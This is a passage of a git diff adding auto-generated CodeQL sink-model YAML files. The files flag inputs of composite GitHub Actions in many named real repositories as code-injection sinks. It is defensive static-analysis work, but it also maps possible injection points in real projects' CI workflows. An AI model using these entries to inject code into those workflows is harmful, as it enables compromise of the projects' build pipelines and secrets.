\ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml new file mode 100644 index 000000000000..def12e487410 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azerothcore/azerothcore-wotlk", "*", "inputs.CXX", "code-injection", "generated"] + - ["azerothcore/azerothcore-wotlk", "*", "inputs.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml new file mode 100644 index 000000000000..768db7317cc3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/azure-datafactory", "*", "inputs.directory", "code-injection", "generated"] + - ["azure/azure-datafactory", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml new file mode 100644 index 000000000000..55218009c022 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["badges/shields", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml new file mode 100644 index 000000000000..17ec5471e85c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["balena-io/etcher", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml new file mode 100644 index 000000000000..55cd8b18241d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["balena-os/balena-engine", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml new file mode 100644 index 000000000000..328d58d9e42b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ben-manes/caffeine", "*", "inputs.attempt-delay", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.attempt-limit", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.arguments", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.graal", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.java", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml new file mode 100644 index 000000000000..836bda1041ad --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bokeh/bokeh", "*", "inputs.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml new file mode 100644 index 000000000000..b6f9ee027f1f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["botpress/botpress", "*", "inputs.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml new file mode 100644 index 000000000000..2f6458219b62 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["braintree/braintree-android-drop-in", "*", "inputs.version", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "inputs.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml new file mode 100644 index 000000000000..374a13ccd82d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["braintree/braintree/android", "*", "inputs.version", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.module", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml new file mode 100644 index 000000000000..fb4608ec70be --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["broadinstitute/gatk", "*", "inputs.identifier", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "inputs.repo-path", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "inputs.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml new file mode 100644 index 000000000000..3a6a4575d304 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["canonical/multipass", "*", "inputs.release-tag-re", "code-injection", "generated"] + - ["canonical/multipass", "*", "inputs.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml new file mode 100644 index 000000000000..d21c609e5eda --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/actions", "*", "inputs.keypair_path", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.role_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.backend_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.vault_url", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.ttl", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.vault_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml new file mode 100644 index 000000000000..76c92f51d267 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/chia-blockchain", "*", "inputs.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml new file mode 100644 index 000000000000..dc48b2e8d20e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chipsalliance/chisel", "*", "inputs.version", "code-injection", "generated"] + - ["chipsalliance/chisel", "*", "inputs.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml new file mode 100644 index 000000000000..b46b5592ac55 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chocobozzz/peertube", "*", "inputs.deployKey", "code-injection", "generated"] + - ["chocobozzz/peertube", "*", "inputs.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml new file mode 100644 index 000000000000..a38482ba6963 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cilium/cilium-cli", "*", "inputs.binary-name", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.binary-dir", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.ci-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.release-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.repository", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.go-mod-directory", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.local-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml new file mode 100644 index 000000000000..ca1bf2f894ff --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cilium/cilium", "*", "inputs.job-name", "code-injection", "generated"] + - ["cilium/cilium", "*", "inputs.lb-acceleration", "code-injection", "generated"] + - ["cilium/cilium", "*", "inputs.mutual-auth", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml new file mode 100644 index 000000000000..4a46ca788e57 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["citusdata/citus", "*", "inputs.flags", "code-injection", "generated"] + - ["citusdata/citus", "*", "inputs.pg_major", "code-injection", "generated"] + - ["citusdata/citus", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml new file mode 100644 index 000000000000..b1c5270165b7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["clerk/javascript", "*", "inputs.auth-email", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.auth-password", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.auth-user", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.registry", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.publish-cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml new file mode 100644 index 000000000000..9fcaa3fff768 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloud-custodian/cloud-custodian", "*", "inputs.poetry-version", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.bucket-url", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.docs-dir", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml new file mode 100644 index 000000000000..f21c3c1f9de2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudflare/workers-sdk", "*", "inputs.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml new file mode 100644 index 000000000000..7ff68860cf83 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudfoundry/cloud_controller/ng", "*", "inputs.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml new file mode 100644 index 000000000000..9e3d5bd41e32 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coder/coder", "*", "inputs.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml new file mode 100644 index 000000000000..63373bd78a79 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coil-kt/coil", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml new file mode 100644 index 000000000000..529614b8d79d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["commaai/openpilot", "*", "inputs.sleep_time", "code-injection", "generated"] + - ["commaai/openpilot", "*", "inputs.docker_hub_pat", "code-injection", "generated"] + - ["commaai/openpilot", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml new file mode 100644 index 000000000000..ce3ce91d773a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["conan-io/conan-center-index", "*", "inputs.files", "code-injection", "generated"] + - ["conan-io/conan-center-index", "*", "inputs.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml new file mode 100644 index 000000000000..ececaa835e94 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["corretto/corretto-8", "*", "inputs.version-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.upstream", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.merge-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.local-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml new file mode 100644 index 000000000000..0c19019e4f34 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cosmos/cosmos-sdk", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml new file mode 100644 index 000000000000..67a21fc2e86f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coturn/coturn", "*", "inputs.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml new file mode 100644 index 000000000000..3f0c5e645de4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crunchydata/postgres-operator", "*", "inputs.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml new file mode 100644 index 000000000000..470109b5e857 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cvc5/cvc5", "*", "inputs.build-dir", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.macos-target", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-examples", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-python-bindings", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-install", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.regressions-exclude", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.strip-bin", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.configure-config", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.configure-env", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml new file mode 100644 index 000000000000..5ffefd58e53f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["d2l-ai/d2l-en", "*", "inputs.command", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.work-dir", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.job-name", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml new file mode 100644 index 000000000000..742e1876811b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.clean-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.deploy-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.wait-between-retries", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.retries-on-failure", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.check-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.build-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.pre-build-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml new file mode 100644 index 000000000000..97c75ae6f5c9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-dotnet", "*", "inputs.command", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.baseImage", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.aas_github_token", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.artifacts_path", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml new file mode 100644 index 000000000000..fa98e84315df --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-go", "*", "inputs.files", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.tags", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.service", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.dd-api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml new file mode 100644 index 000000000000..3bc48b644d00 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-js", "*", "inputs.container-id", "code-injection", "generated"] + - ["datadog/dd-trace-js", "*", "inputs.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml new file mode 100644 index 000000000000..81e079430266 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datafuselabs/databend", "*", "inputs.dataset", "code-injection", "generated"] + - ["datafuselabs/databend", "*", "inputs.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml new file mode 100644 index 000000000000..a1fdb476748e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["davatorium/rofi", "*", "inputs.logfile", "code-injection", "generated"] + - ["davatorium/rofi", "*", "inputs.windowmode", "code-injection", "generated"] + - ["davatorium/rofi", "*", "inputs.cc", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml new file mode 100644 index 000000000000..5744f3e74956 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["debezium/debezium", "*", "inputs.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml new file mode 100644 index 000000000000..852e39799d93 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["defenseunicorns/zarf", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml new file mode 100644 index 000000000000..a0d7eb51354e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "inputs.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml new file mode 100644 index 000000000000..8d10d22cd5c0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["department-of-veterans-affairs/vets-website", "*", "inputs.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml new file mode 100644 index 000000000000..c99c630853e3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["devexpress/devextreme", "*", "inputs.name", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "inputs.result", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml new file mode 100644 index 000000000000..8554ebec65fa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["diggerhq/digger", "*", "inputs.checkov-version", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-auth-credentials", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-workload-identity-provider", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-service-account", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml new file mode 100644 index 000000000000..6f0878a77cbd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["diku-dk/futhark", "*", "inputs.script", "code-injection", "generated"] + - ["diku-dk/futhark", "*", "inputs.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml new file mode 100644 index 000000000000..198109f790c1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["discourse/.github", "*", "inputs.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml new file mode 100644 index 000000000000..e634eaa38a2c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -0,0 +1,8 @@ 